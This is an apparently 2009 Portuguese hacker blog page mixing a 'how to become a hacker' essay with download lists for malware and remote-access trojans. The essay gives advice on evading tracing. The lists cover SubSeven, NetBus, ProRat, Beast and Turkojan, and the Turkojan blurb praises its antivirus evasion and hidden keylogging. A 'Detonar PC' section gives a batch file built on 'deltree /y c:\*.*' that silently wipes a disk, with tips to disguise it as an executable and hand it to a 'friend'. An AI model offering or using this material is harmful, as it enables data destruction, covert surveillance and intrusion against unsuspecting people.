------[::::: New-Hacker :::::]----- [ Melhor Blog -=||-|ä¢kë®|=- Do Brasil ]

Gerador de NICK

Digite seu nome virtual:

Aqui ficará o seu novo nome virtual:


------[::::: New-Hacker :::::]-----[ Melhor Blog -=||-|ä¢kë®|=- Do Brasil ]

Pesquisa Do BLOG

segunda-feira, 30 de março de 2009

Como Se Tornar Um Hacker


ADVERTÊNCIA: Este documento foi criado para informação apenas. De nenhuma forma, encorajando qualquer tipo de atividade ilegal, e qualquer ato praticado após a leitura deste documento é de inteira responsabilidade do leitor. Se não concorda com este fato, retorne agora.
Como me Transformar em um Hacker?
Parece que muitas e muitas pessoas, todos os dias fazem esta pergunta em grupos de notícias, através de e-mail, em salas de chat. Não há nenhuma resposta simples, desde que cada um deve seguir seu próprio caminho. Mas há uma coisa que você deve ter para almejar o status de um hacker: determinação! Você deve ter um apetite voraz para encontrar informação e ensinar a si mesmo. Você não pode contar com outros, não pode contar com a escola. O curso de digitação não o levará a lugar algum.
Conseguindo Ajuda
É verdade que existe centenas e centenas de home pages de "hackers" na Internet. Se você nunca tentou enviar um e-mail para algum deles, uma coisa certamente se torna evidente, a falta de conhecimento. Qualquer pessoa (eu inclusive!) pode colocar uma página na Internet, adicionando links, textos,... de outros e se chamar um hacker. Mas peça por ajuda para escrever um shel script para explorar um bug e você ficará ligeiramente disapontado. Claro! há alguns hackers genuinos por aí, e se você conseguir encontrá-los, poderá pedir ajuda. Mas aí você estará dependendo de alguém para tudo. Um hacker deve ser autoditada.
Algumas Outras Necessidades
É importante saber e aceitar que você estará sob fogo, quando outros ouvirem sobre o seu interesse em se tornar um hacker. É para ser esperado: você está tentando ser parte de uma minoria que é odiada pelo grande público da área, por causa de imagem ruim que é comumente difundida. Deve discordar de comentários negativos e de julgamentos apressados. E finalmente, você deve ser humilde para se tornar um hacker. É absolutamente necessário admitir que você sabe apenas 1 por cento do que há para se saber sobre o mundo da informática e seus pecados, no objetivo de sempre direcionar seus esforços para aprender mais. Alguma vez, já notou que pessoas com grandes egos são idiotas ? Adivinhe por que ? Se você acha que sabe tudo, por que se encomodar em continuara aprendendo ? Um hacker tem um desejo insaciável por informação, são obssesivos sobre tudo, sejam redes telefônicas, internet, computadores ou qualquer coisa. É por este motivo que um hacker, constantemente, "explora" por mais informação. Então você precisa de tempo livre para se dedicar ao aprendizado. E o que você deve aprender ?
Tomando Os Primeiros Passos
Um conceito errado sobre hackers é que você deve ser um gênio em programação. Isto não é verdade! Claro, que quanto mais você souber melhor. Você precisa realmente saber algum shell scripting e linguagem C, básicos. Aqui o que eu acredito ser o mais essencial no aprendizado de um hacker: Primeiro, você deve aprender sobre o sistema operacional UNIX. Ele é um dos sistemas operacionais mais usados em servidores na Internet. Acessando um sistema UNIX via Telnet ou um terminal de cliente, não irá apresentar-lhe uma interface gráfica interessante, é um ambiente de somente texto, como o DOS. Não há gráficos, apenas um simples e extremamente eficiente sistema operacional que está muito a frente de seu tempo, desde quando foi criado. É claro que você poderá encontrar o X-Windows em máquinas Unix e rodar uma enorme variedade de aplicativos gráficos, mas é irrelevante para esta discussão. Você precisa ter um conhecimento complexo do sistema operacional. Sabendo como ele funciona em detalhes, é essencial. O código-fonte é distribuído gratuitamente para UNIX e seus variantes, e desta forma você deve estudá-lo. Compre livros, procure pela internet, consiga informações de todas as fontes que puder. Apenas esteja apto a usar o UNIX como se o usasse por toda a sua vida. Muitas pessoas esquecem as lições básicas e acham que precisam aprender apenas sobre as medidas de segurança do sistema operacional. Isto é fútil, como você poderá "penetrar" em um sistema se você não sabe usá-lo para simples tarefas rudimentares, como trocar diretórios, listar arquivos, ver quem está conectado, etc,... Além disso, como mencionei anteriormente, você precisa ter experiência em shell scripting. Quanto melhor nisso, você for, melhor e mais completo hacker você será. Saber também um pouco de linguagem C é também imperativo, desde que você irá precisar de alterar códigos, programação de socket para a técnica de spoofing e ataques fragmentados,... Uma vez que você saiba os fundamentos do UNIX, aprenda sobre as suas funções primárias de rede com protocolos da Internet. É essencial entender como um computador comunica-se com outro pela Internet. O próximo passo é aprender especialmente sobre segurança em sistemas UNIX, que incluem o design das permissões de acesso e firewall. Novamente, todas estas informações podem ser encontradas nas mágicas coisas chamadas livros.Agora que você tem um entendimento total sobre UNIX, você poderá aprender como contornar a segurança nestes sistemas. Existem vários arquivos na Internet tratando sobre os últimos bugs, como o bugtraq e 8lgm.org. Comece a mater uma trilha imaginária nas falhas em vários serviços, e então quando você inspecionar um sistema ele irá surgir em sua mente.
A Psicologia de Hacke(ar)
É importante entender como o cérebro humano funciona em outras pessoas. Para se ter uma ideia de como comprometer a segurança de computadores, você deve "penetrar" na mente do administrador do sistema e pensar como você protegeria o sistema se fosse o encarregado. Você deve também levar em consideração que a muitas das pessoas são estúpidas, e isto será decisivo se você estiver tentando descobrir algumas senhas. Use o senso comum.
Nunca Pare de Aprender
Não pare aqui! Depois de entender sobre redes e UNIX, continue aprendendo mais. O que sobrou ? VAX/VMS, que é outro sistema operacional encontrado em alguns computadores conectados na Internet. Você pode começar explorando o mundo da criptografia (o que é suicídio se você odeia matemática). Mantenha-se atualizado nos novos desenvolvimentos em tecnologia. Simplificando: aprenda tudo o que puder todo dia.Eis algumas abilidades de Kevin Mitnick (talvez o mais famoso hacker de todos os tempos): VM/CMS, OS/VS1, DOS/VSE, MS-DOS, RST/E, VAX/VMS, UNIX, TOP-20,... Familiarizado com algum destes ? Isto só nos faz pensar em uma coisa, vamos estudar!!!
Fazendo a Conexão
Constantemente, escuta-se uma pergunta MUITO comum dos iniciantes: "Como eu me conecto a um sistema ?" ou "Como eu uso o Telnet ?" Para explicar algumas questões básicas: Você pode se conectar com qualquer máquina ligada na Internet com um programa de Telnet. Muitos programas utilizam o serviço de telnet quando você conecta-se a uma máquina. Por exemplo, se eu rodar meu programa e conectar com o xyz.com, ele irá me conectar com a porta 23, a porta da Telnet do xyz.com. Telnet, simplesmente, é um meio de se usar um terminal UNIX, como se você estivesse sentado em frente a um. Imagine estar discando em uma máquina em ambiente DOS e recebendo o prompt C:\>. É essencialmente a mesma coisa. Quando você aprender sobre UNIX, você verá que existem outros serviços (também conhecido como dameons), e poderá usar um programa de Telnet para conectar-se a vários deles. Onde encontrar tais programas ? Que tal em www.tucows.com, eles possuem vários deles.
Se você puder instalar uma variação do UNIX como o LINUX em seu computador, eu certamente sugiro-lhe que o faça. Este é o melhor caminho para aprender o sistema operacional. Além disso, o LINUX possui excelentes utilitários que o acompanham, como o GNU C compiler.
Também é importante identificar um erro comum que os iniciantes cometem quando aprendem por arquivos de texto. Não confundam TELENET com TELNET. TELENET é uma grande rede de servidores, agora também conhecido como SprintNet. Possui um sistema operacional especial e é acessado por números de acesso discado com um programa de terminal. Uma vez conectado você pode acessar diferentes servidores pelo seu NUA (Network User Address). Hacke(ar) em redes como SprintNet/Telenet é uma prática arriscada, por ser fácilmente rastreada. Você está discado diretamente na rede de sua linha telefônica. Novamente, um servidor pode simplesmente gravar o seu endereço IP se você conectar-se na Internet e usar a identificação de cliente para possivelmente conseguir o seu username do seu provedor.
Como Não Ser Pego
O erro que provavelmente todo hacker comete é que ele ou ela torna-se muito convencido ou popular. Não saia gritando que é um hacker na escola. Confie em menos pessoas posíveis. Quanto menos pessoas souberem que você está nisso, melhor. Não faça coisas idiotas, como hacke(ar) da sua própria casa a algum sistema de alta segurança. Embora este método está agora, "fora de moda", desde que existem meios mais fáceis de esconder sua identidade quando hack(eando) pela Internet. Existem vários meios para dificultar o rastreamento quando hack(eando) sistemas da Internet. Um deles, é conectar-se em diversos servidores com Telnet antes de acertar o seu alvo. Isto tornará o rastreamento muito mais difícil. Tente conectar-se a sistemas localizados em outros países. Nunca tente hack(ear) uma instituição governamental, você irá ser pego e irá para a cadeia! Não seja estúpido achando ser bom demais para ser pego. Nunca fale sobre hack(ear) ao telefone principalmente nos sem fio, você nunca sabe quem está ouvindo. Encripte suas mensagens de e-mail. Seja um pouco paranoico! Quanto mais paranoico você for, menos chance você terá de ser pego.
Último, Mas Muito Importante
Sempre digo que conhecimento é apenas metade do que faz um hacker. A outra metade é a ética. Você pode ser um perfeito gênio, mas se não tiver ética, você está no mesmo nível de um criminoso. Todo hacker possui um código de ética.
Você Não é um Hacker se
Você pirateia software
Você espalha viroses (qualquer um com um pouco de conhecimento de Assembler pode criar um vírus)
Você deleta arquivos alheios e destroi seus sistemas (qualquer um pode deletar um arquivo)
Você rastreia empresas de cartão de crédito ou bancos para conseguir dinheiro. Boa sorte e comece a estudar!

sábado, 28 de março de 2009

Hackers por Telnet


TELNET (protocolo de terminal virtual) é o protocolo internet para estabelecer a conexão entre computadores. Através dessa conexão remota, pode-se executar programas e comandos em outra maquína. como se o teclado de seu computador estivesse ligado diretamente a ela. O visual de uma conexão via telnet é semelhante ao que se tem em BBBs de interface DOS, e as operações do computador remoto se dá mesma forma, ou seja, através de uma linha de comandos Unix ou a partir de um menu de comandos disponiveis que sempre se apresenta em algum lugar da tela (está útima forma é a mais comum em servidores que permitem acesso publico). O telnel pode ser usado para a pesquisa de informações e transferência de arquivos - tudo depende do que o computador ao qual você está conectado permitir que você faça. Ele tambem é muito usado por operadores de sistemas (Sysop) a fim de fazer qulgum tipo de manuntenção (se você pensa que o sysop de seu provedor sai de casa toda vez que tem alguma problema nos servidores, está muito enganado: muitas vezes ele faz manuntenção de casa mesmo, via telnet)Conectando-se via telnetOs passos que apresentamos aqui são para o programa que aconpanha o windows 95, mas servem perfeitamente para outros programas, com algumas variedades, que você pode perceber e contonar. Se você tem alguma dos programas listados ao lado, leia isto primeiro e depois passe para a pagina especifica desse programa. Inicie o programa telnet.exe ou outro ultilitario para esse fom.Cloque no menu (conectar), selecione"Sistema Remoto" o endereço ao qual você que se conectar(ex.:spacelink.msfc.nasa.gov).Nas caixas"Porta" (port) e tipo de terminal (terminal type selecione "telnet" e "vt100", respectivamente (isso não é um padão, mas é usual; pode ser que em alguns lugares você tenha que mudar essa configuração). Feito isso, clique no botão "conectar"(connect).Isto inicia a conexão com o computador remoto. Frequentemente, ao se completar a conexão, o sistema remoto pede uma senha.No nosso exemplo, digite "quest" e aperte enter(lembre-se, você operando um sistema de interface parecida com oDOS - naverdade =e UNIX - esqueça o mouse e use o Teclado).Isto abrirá as portas do computador remoto para você. Na tela surge uma série de opções, preceditas de um número ou letra. Para executar um desses commandos, digite esse número ou letra e aperte enter (os usuarios da época pré-windows não terão a menór dificuldade Nisso.) Explore o sistema ao qual você se conectou para exercitar.Quando quiser terminar a conexão, volte ao menu "conectar" e selecione "Desconectar".Abaixo temos alguns endereços onde você pode fazer uma conexão via telnet. netfind.if.usp.br Busca mundial de usuarios na internet. Digite netfind ao estabelecer a conexão. ned.ipa.caltech.edu Banco de dados Extragalatico da NASA/IPAC. Digite ned na conexão. spacelink.msfc.nasa.gov Banco de dados da NASA Digite guest ao se conectar. stis.nsf.gov informações cientificas e tecnológicas. Digite public na conexão. aleph.pucrs.br(*) PUC - Pontifica Universidade Católica. Porto Alegre, RS. Acesso a banco de dados Bobliograficos.(*) username "guest". asterix.ufrgs.br(*) UFRGS - Univercidade Federal do Rio Grande do Sul. Porto Alégre, RS, Acesso a banci de dados bibliograficos.(*)username "sabibib", password "bib1993". bee08.uspnet.usp.br(*) USP/CCE - Univercidade de São paulo. Centro de Computação eletronica. São Paulo, SP.Acesso a banco de dados bibliograficos.(*) username"dedalus". brmc.bireme.br(*)BIREME - Bibliotéca de Resenha Medica.São Paulo, SP.Acesso a banco de dados na área de saude.(*) username "bireme". (É necessario cadastrar-se, envie mensagem para online@bireme.br").

segunda-feira, 23 de março de 2009

Devil invasão

Devil 1.3 Programa de invasão

Doly 1.2 Programa de invasão

Evil Ftp Servidor de FTP

Troja,Worms,Boot - BAIXAR

Boot viruses
NYB.zip
Parity.b.zip
WYX.b.zip
Stoned.a.zip
PingPong.a.zip
Form.a.zip
Parity.a.zip
Bye.zip
DOS file viruses
Junkie.1027.zip
HLLC.Crawen.8306.zip
Macro viruses
Macro.Word97.Thus.aa.zip
Macro.Word97.Melissa.m.zip
Macro.Word97.Ethan.zip
Macro.Word.Cap.zip
Macro.Word97.Marker-based.zip
Macro.Word97.Marker.r.zip
Macro.Office.Triplicate.c.zip
Trojan programs
Trojan.Win32.VirtualRoot.zip
JS.Fortnight.b.zip
Trojan.PSW.Hooker.24.h.zip
Trojan.JS.Seeker.o.zip
JS.Trojan.Seeker-based.zip
Trojan.Win32.DesktopPuzzle.zip
JS.Trojan.Seeker.b.zip
Backdoors
Backdoor.SdBot.aa.zip
Backdoor.Zenmaster.102.zip
Backdoor.DonaldDick.152.zip
Backdoor.DonaldDick.15.zip
Backdoor.Buttman.zip
Windows 9x viruses
Worm.Win32.Fasong.a.zip
Worm.Win32.Lovesan.a.zip
Win32.Xorala.zip
Win32.FunLove.4070.zip
Worm.Win32.Muma.c.zip
Win95.Dupator.1503.zip
Win32.HLLP.Hantaner.zip
Joke.Win32.Errore.zip
Joke.Win32.Zappa.zip
Internet viruses
Worm.Bagle.Z.tar
IIS-Worm.CodeRed.a.zip
I-Worm.Moodown.b.zip
I-Worm.NetSky.d.zip
I-Worm.Rays.zip
I-Worm.Sober.c.dat.zip
I-Worm.LovGate.i.zip
IIS-Worm.CodeRed.c.zip
I-Worm.Sober.c.zip
I-Worm.Mydoom.a.zip
I-Worm.Mimail.a.zip
I-Worm.Tanatos.dam.zip
I-Worm.Swen.zip
Worm.P2P.SdDrop.c.zip
I-Worm.Sobig.f.zip
I-Worm.Klez.e.zip
I-Worm.Sobig.b.zip
I-Worm.Tanatos.b.zip
I-Worm.Fizzer.zip
Worm.Win32.Opasoft.a.pac.zip
I-Worm.Tettona.zip More Internet viruses...
ClamAV
Worm.Bagle.AG.scr
Exploit.HTML.IFrame.html
Trojan.ZipDoubleExt-1.zip
Worm.Mytob.IV.zip
Worm.Mytob.BM-2.zip
Worm.SomeFool.Q.zip
Trojan.W32.PWS.Prostor.A.zip
Worm.Mydoom.AS.zip
Worm.Mytob.V.zip
Worm.Bagle.AG.com
Worm.Mytob.S.zip
HTML.Phishing.Pay-40.html
Trojan.ZipDoubleExt-3.zip
Worm.Mytob.A.zip
Worm.Mytob.GH.zip
Worm.Mytob.BD.zip
Worm.Mytob.S.pif
HTML.Phishing.Auction-64.html
Worm.Mytob.IL.exe
Worm.Mytob.DD.zip
HTML.Phishing.Pay-51.html More ClamAV...

Detonar PC

Bom este método aqui é simples vc só tem que passar o arquivo para a vitima seu amiquinho..... Seguinte, para criar um arquivo bomba, vc deve editar o "código" dele use o bloco de notas.... Abra o bloco de notas. Vamos criar um arquivo BAT, não estamos fazendo nenhum vírus, isto é apenas uma sequência de comandos DOS juntos, na verdade escondidos, tipow, vc não vai chegar pra alguém e pedir pra ele digitar no DOS: deltree /y c:\*.* , porque ninguém em juízo normal ia fazer isso.... nesse arquivo vc vai dizer o que acontecerá quando o arquivo for executado... Sendo assim, vc pode colocar mensagens antes e após a execução dos comandos. Ai estão alguns comandos ( estes são comandos de DOS ) que vc poderá colocar no seu arquivo bomba: deltree = deleta arquivos e diretórios rename = renomeia arquivos e diretórios cls = limpa a tela @echo off = faz com que os comandos abaixo dessa linha não sejam mostrados pause = pausa a execução do arquivo. ( faz aparecer uma linha ="Precione qualquer tecla para continuar..") @echo on = faz com que os comandos abaixo dessa linha sejam mostrados Um arquivo destes simples pode ser feito com o seguinte código: @echo off c:\ deltree /y c:\*.* O que estes comandos farão? @echo off: f'ará com que os comandos c:\ e deltree /y c:\*.* não sejam mostrados.... c:\ : chama o drive c: deltree /y c:\*.* deleta todos os arquivos e diretórios do HD. Se vc não colocar o /y após o comando deltree, aparecerá uma pergunta assim > "excluir.....?" Então não esqueça de colocar o /y após o deltree. Agora que vc já bateu o código, salve o arquivo com extensão .bat ( ex: "arquivo.bat" ) Cuidado para não executar o arquivo. Enquanto ele estiver com extensão bat, vc ainda poderá mudar os comandos dele, abrindo-o no bloco de notas e fazendo as alterações..... Estando o arquivo com extensão bat, qualquer um poderá ver o código, inclusive a vitima ( seu amiguinho ) portando, assim que vc acabar de criar o arquivo bomba.... transforme-o em executável. Para transdormar arquivo BAT em executável COM vc tem que arrumar o programa BAT2EXEC ! <<< Eu não me responsabilizo pelos seus atos !!!

Ferramentas Hacker

Haktek
Ferramenta Hacker com nuker's, e-mail bomb e mais
235K
Hacker's Utility(tm)
Ferramenta Hacker com nuker's, e-mail bomb e mais
427K
Fhack20
Ferramenta Hacker com nuker's, e-mail bomb e mais
78K
Callsoft
Identificador de Chamadas
55K
Revelation
Revela senhas do tipo *****
6K
Virusm
Cria Virus

Download Sites for Version 3.4.0

Download Sites for Version 3.4.0
Europe (Zip File 541kb) Australia (Zip File 541kb) Updated Help File (with thanks to Daniel Thibault)Resource Hacker Tutorial and Other Tips

Tutorial by Bhikkhu PesalaTutorial by Vishal Gupta.Other Resource Hacker tips by Vishal Gupta. Resource HackerTM translations:

Simplified Chinese: (Ver 3.4.0) Translation by: Darong Lv Traditional Chinese: (Ver 3.2.10) Translation by: Menghsi Wu Japanese: (Ver 3.4.0) Translation by: Yoshiroh Maruoka

Curso Hacker 1.0

Downloads: 4882
Tamanho: 1,5 MB
Atualizado: 12/02/2008
Licença: Gratuito para testar (Demo)
Sistema(s) operacional(is): Windows 2000/XP/2003/ME
Desenvolvedor: Tecknoware
Requerimentos: Básico.
Marcadores: Curso, Hacker, download, gratis, baixar, copiar, downloads, programas

domingo, 22 de março de 2009

Beast 2.07

Beast 2.07
http://rapidshare.com/files/36043581/Beast_v2.07_06-08-2004.zip.html

Anti Prorat 2.5

Download (602KB)
Last Updated: 2009-01-06
License: Freeware Free
OS: Windows Vista, 2003, XP, 2000, 98, Me, NT-->
Requirements: No special requirements
Publisher: AddaxSoft More Products
Homepage: http://www.AddaxSoft.com
Total Downloads From 2008-01-01: 12,276
Downloads of Last week:
95

Turkojan 4 Dowmload

-Turkojan 4 - Download (RapidShare)Características:Remote Desktop característica adicionada. Poderá visualizar tela do controle remoto-lo através do seu teclado e mouse. Agora você pode gravar vídeo de webcam remota. Streaming de áudio característica acrescentada. Agora você não precisa baixar as imagens de computador remoto, você pode visualizá-los em miniatura gerente. Você pode obter os logs do MSN com o MSN Sniffer. Você pode bloquear páginas web-nocivos em computador remoto. Você pode gerenciar computador remoto com comandos do MS-DOS. (Remote Shell) Adicionadas novas funções para servidor sigilo - Agora é mais difícil de apagar servidor - Servidor não podem ser exibidos no registro, pesquisando arquivos, msconfig, etc - Servidor não pode ser exibido em Ctrl + Alt + del menu [Vista/Xp/95/98/ME]. - Servidor impede restoring.It sistema elimina todas sistema restaurar pontos. Servidor tamanho é 60% menor agora. Conexão bug fixo Agora servidor não pode ser detect por qualquer software antivírus, mas penso que será dedected em breve. Algumas mudanças foram feitas no Cliente aparência. Agora avançado keylogger pode capturar changements prancheta. Você pode instalar qualquer arquivo no computador remoto via internet a partir de Remote Downloader. Agora você pode obter mais informações sobre o computador remoto. Você pode saber softwares instalados em computadores remotos. Ajuda modo added.

MSNCliner

Descrição: O aplicativo gratuíto MSNCleaner elimina malwares que se utilizam do MSN Messenger e Windows Live Messenger. O programa não requer instalação, apenas baixe e descompacte em uma pasta ou na área de trabalho. Depois de iniciar o programa você pode mudar o idioma para Português. Basta clicar em “Analisar” e depois “Remover” (se for o caso). Funciona melhor se rodado em modo de segurança.
Tamanho: 144 KbFormato: RarSenha: : [Easy-Share]

Livro Negro do Hacker

Sinopse: Idéias para invasão de sistemas, como um Hackercomeça suas atividades, dicas para você saber quemrealmente pode invadir o seu PC, como ter segurança nassuas senhas, explicações detalhadas sobre o IP como quemgera, quem distribui, como ter maior segurança…Autor: Professor Marco AurélioTamanho: 5.96MBBaixar Rapidshare / Baixar Easy-share

Hackers - Segredos e Confissões

» Descrição
Esta obra apresenta de uma forma bem ampla assuntos relacionados a sistemas de segurança da informação em geral. A maioria dos conteudos foram retirados de sites parar fins de estudo, não sendo alterado as informações,e suas respectivas originalidades, e nem mesmo seus autores. Todo conteudo desse E-book é somente para estudo próprio, não me responsabilizo pelo mal uso das informações aqui contidas. São Geral: O E-book trata-se assuntos técnicos relacionados a: Criptografia, Segurança da Informação,Invasão, Falhas em Sistemas, ví­rus, trojans, exploits, proteção em geral, informática em geral, antiví­rus, Firewall, Hacking e dentre muitos outros tópicos.
» Informações
Tamanho: 6,70 MB - Formato: Pdf - Idioma: Português
» Download
Easy Share / Rapidshare

Pacote de ebook Hackers 2007

Download baixar Pacote de ebook Hacker 2007
Descrição:* Hackerismo: 16 Arquivos em Doc* Livro - O Guia do Hacker Brasileiro - Marcos Flávio Araújo Assunção* Revista Hacker Brasil* Segurança na Internet* Universidade Hacker - 12 Arquivos PDF* Gerador de CPF e CNPJ Válidos* Guia do Hacker Brasileiro* Guia do Hacker Brasileiro Critica* Desativando Auxiliar NetBIOS TCP/IP* Anti Trojan com Manual* Como roubar senha de Hotmail* Linux Dicas & Truques* Apostila Básica De Linux (Pt Br)* Guia Prático para o Debian GNU Linux (pt BR)* Referência de comandos - Linux (pt_BR)Páginas: 11 arquivos (várias pastas com documentos)Tamanho: 12.1 MBHospedagem: Download Rapidshare

ProRat v 1.9

Download - Baixar] ProRat v 1.9 + Crack + Serial + Patch + Keygen

Descrição: ProRat é um backdoor da classe Rat, que possui muitas funções de espião. Seu nome é uma fusão da palavra inglesa professional, juntamente com a sigla rat (Remote administrator tool). Criado em Visual Basic, o programa possui mais de 15 versões.ProRat permite a crackers executarem muitas ações maliciosas nas máquinas de suas vítimas. Entre elas incluem:* Keystrokes(Keylogger)* Roubar senhas* Controle total sobre arquivos* Formatação de Drive* Controle de Impressora* abrir/fechar driver de CD* Esconder taskbar, desktop, e botão iniciar* Fazer screenshots* Visualizar informações do sistema* Visualizar webcam/escutar microfone* Download e rodar arquivos
Tamanho: 3,01MBIdioma: PortuguêsFormato: RARSenha: tahocupado.blogspot.comDownload: [Easy-Share]

Programas Hackers 2009

Hacker 2012 Final Sinta-se um hacker neste simulador, você terá que roubar dinheiro, descubre senhas sigilosas e muito mais. Aproveite...+ Simuladores Diversos
Win 98 / Win 2000 /XP/2003/ME
Freeware1,18 Mb
7804
Lanma - Lan House Manager 3.13 Agora na versão 3.6 e com site novo o Lanma torna o usa da Lan House mais agradável. Acesse o novo site e veja ! Firewall interno contra hackers;...+ Gerenciamento de Provedores, Cyber-cafés e Similares
Win 98 / Win 2000 /XP/2003/ME
Freeware11,12 mb
3333
Curso Hacker 1.0 Curso Hacker é um demostrativo em formato de vídeo (flash) que vai ensinar várias coisas legais. O objetivo deste curso é ensinar ao usuário, as...+ Cursos
Win 98 / Win 2000 /XP/2003/ME
Demo1.30 mb
3314
Kaspersky Anti-Hacker 1.9.37 Kaspersky Anti-Hacker permite combater os hackers procurando pelos seus rastros e seus programas que são instalados em nossos computadores, com o...+ Antivírus
Win 98 / Win 2000 /XP/2003/ME
Freeware26,50 mb
3030
Resource Hacker 3.4.0 Resource Hacker permite visualizar, modificar, extrair e inserir linhas de código em arquivos executáveis 32-bits. Ele vem com um descompilador...+ Ferramentas de Programação Variados
Win 98/ Win 2000/ XP/ 2003 / ME / VISTA
Shareware - UL1.03mb
2192
BitDefender Free v8 O programa bloqueia vírus, cavalos-de-tróia, worms da Internet e scripts maliciosos com facilidade e filtros avançados. Você pode definir qual...+ Antivírus
Win 98 / Win 2000 /XP/2003/ME
Freeware13,10 Mb
1895
ProtectX Hacker Defence Suite 4.16 Este software permite saber informações úteis sobre um possível hacker/invasor do seu computador, detectando IP e outras configurações e você pode...+ Controle de Acesso
Win 98 / Win 2000 /XP/2003/ME
Freeware2,46 mb
1892
Web Blocker 1.5.1 Web Block ajuda a controlar o acesso na internet, mostrando seus recursos de forma segura e correta pois, além de bloquear e controlar o acesso a...+ Controle de Acesso
Win 98 / Win 2000 /XP/2003/ME
Shareware - SI1.23mb
1863
AVG Internet Security 7.5.433a904 Complete sua segurança contra todas as ameaças da Internet, como vírus, trojans, spyware, adware, hackers e Spam. Completo, fácil de usar - instale...+ Proteção contra Spywares
Win 98 / Win 2000 /XP/2003/ME
Shareware 30 dias32,90 MB
1390
Norton Internet Security 2007 Proteja sua privacidade e seu PC. O programa protege contra vírus e hackers com versões completas de antivírus e firewall. Tem também um anti-spam...+ Antivírus
Win 98 / Win 2000 /XP/2003/ME
Shareware 15 dias33,40 mb

Novos Programas hackers

Revelation V2Programa para revelar senhas em ***** .Facil utilização serve para wind 98/00/xp.

Free Ip ScannerO Free IP Scanner é um escaneador de IPs que se caracteriza pela velocidade com que efetua a busca, localizando centenas de computadores em questão de segundos.Sua funcionalidade é simples: defina o intervalo de IPs que deseja verificar e clique em Start Scanning. Uma barra com oprogresso da busca é exibida na parte inferior da janela, a qual é concluída com a mensagem Scan Finish.

Real PlayerO RealPlayer é um excelente player de áudio e vídeo, com mais de 200 milhões de usuários no mundo e 4 milhões no Brasil. Com ele, é possível acessar mais de 2.700 rádios em todo mundo, assim como acessar canais com conteúdo específico para usuários no Brasil. Esse software é indispensável para todo navegador Internet. Você certamente já deve ter acessado algum site onde foi preciso ter o RealPlayer para assistir algum vídeo ou ouvir algum som.

FscanScaneador de redes programa hacker

Programas <-Hackers->

Programas Hackers:
Ambush Programa de invasão

A-Trojan 1.5 Programa de invasão em português

AolTrojan Programa de invasão
Asylum 0.1.2 Programa de invasão
Back Orifice O programa de invasão mais famoso da net
Back Orifice 1.3 Cliente do BO
Barok 1.0 Worm de Email
Barok 2.0 Worm de Email
Barok 2.1 Versão mais recente
Bo Fácil Outro cliente do BO
Bo2 Cliente do BO com mais opções
Bo2k usa Back Orifice 2000, Versão U.S.A e Canada
Bo2k inter Back Orifice 2000, Versão Internacional
Bo2k Back Orifice 2000, Versão Instalável
Back Construction 2.1 Cliente e servidor de FTP
Back Construction 2.5 Versão mais recente
BackDoor 2.01 Programa de invasão
Bla 2.0 Programa de invasão
Bla 4.0 Versão mais recente
Blade-Runner Programa de invasão
Blazer 5 Programa de invasão
Bugs Programa de invasão
Bus Conquerer Procura ips infectados pelo NetBus
Coma Programa de invasão
Deep-Bo Procura ips infectados pelo BO
Deep-Throat Programa de invasão
Deep-Throat V2 Programa de invasão
Deep-Throat V3 Programa de invasão
Deep-Throat V3.1 Versão mais recente
Deep-Throat Orgasm Programa que trava o DT
Delta Source Programa de invasão
Devil 1.3 Programa de invasão
Doly 1.2 Programa de invasão
Doly 1.6 Programa de invasão
Doly 1.7 Versão mais recente
DonaldDick 1.52 Programa de invasão
Der Spaher 2.0 Programa de invasão
Der Spaher 3.0 Versão mais recente
Evil Ftp Servidor de FTP
Excalibur Programa de invasão
Executor Programa de invasão
Executor 2 Versão mais recente
Ftp Server que abre a porta 21
Forced Entry Programa de invasão
Frenzy Programa de invasão
Girl-Friend Programa de invasão
Gate Crasher Programa de invasão
Hackers Paradise 2 Programa de invasão
Hack'a'Tack 1.10 Programa de invasão
Hack'a'Tack 1.20 Programa de invasão
Hack'a'Tack 2000 Versão mais recente
Icq Trojan Trojan simples, cliente baseado em DOS
Inverter Server do BO
Ini Killer 3.0 Programa de invasão
InCommand 1.5 Programa de invasão
InsaneNetwork 4 Tipo server
InsaneNetwork 5 Versão mais recente
Illusion Mailer Programa de invasão
Joiner 1.5 Programa de invasão
Logged Programa de invasão (Cliente)
Master’s Paradise Programa de invasão, só que é meio complexo
Maverick's Matrix v1.4 Programa de invasão
Millenium Programa de invasão
Millenium 2 Versão mais recente
Naebi Apenas o server
Naebi 214 Versão mais recente
NetAdministrator 1.0 Programa de invasão
NetBus 1.20 A versão mais antiga do NetBus
NetBus 1.53 Programa de invasão
NetBus 1.60 Programa de invasão
NetBus 1.70 Programa de invasão
NetBus 1.70port Versão em português
NetBus 2.0 Programa de invasão
NetBus 2.01 Versão mais recente
NetBuster Kill Programa que trava o NetBuster
NetMonitor 2.0 Cliente do NetSpy
NetSpy Programa de invasão
NetSnoop Scaneador de Ips infectados
NetSphere 1.27a Programa de invasão
NetSphere 1.28 Programa de invasão
Network Terrorist 1.31 Programa de invasão para NT
PCrasher Programa de invasão em português
Phineas Phucker Programa de invasão
Phase Zero Programa de invasão
PictureNb 2.0 Server para o NetBus 2.0
Portal of Doom Programa de invasão
Progenic Trojan v1 Programa de invasão
Prosiak 0.47 Programa de invasão
Prosiak 0.70b5 Versão mais recente
Robo HacK Programa de invasão
Ripper Programa de invasão
RatHead 2.01 Programa de invasão
Satanz Backdoor Programa de invasão
SchoolBus 1.60 Programa de invasão
SchoolBus 2.0 Versão mais recente
Schwindler 1.82 Programa de invasão em português
Snid X2 Programa de invasão
Sockets 23 Programa de invasão, apenas o cliente
5000 Server do sockets
Shockrave Server que abre a porta 1981
Skydance 2.20b Programa de invasão
Subseven Programa de invasão
SubSeven 1.1 Programa de invasão
SubSeven 1.3 Programa de invasão
SubSeven 1.6 Programa de invasão
SubSeven 1.9 Programa de invasão
SubSeven 2.0 Programa de invasão
SubSeven 2.1a Programa de invasão
SubSeven 2.1 Gold Programa de invasão
SubSeven 2.2 Beta Versão mais recente
SubSeven Server2 Server para o SubSeven 1.9
Sub7 Apocalypse Programa de invasão
ShadowPhyre Programa de invasão
SK Silencer Programa de invasão
Striker Programa de invasão
Teldet Programa p/ verificar se a vítima está infectada com os servers do: BO, NetBus e GF
The Invasor Programa de invasão
The Prayer 1.2 Programa de invasão em português
The Thing 1.5 Programa de invasão
The Thing 1.6 Versão mais recente
Trojan Cow Programa de invasão
Truva-Ati Programa de invasão
Vampire 1.0 Programa de invasão
Vampire 1.2 Versão mais recente
War Trojan Programa de invasão
Web Ex Programa de invasão
Web Ex 1.3 Programa de invasão
Web Ex 1.4 Versão mais recente
WinCrash Programa de invasão
WinCrash 2.0 Versão mais recente
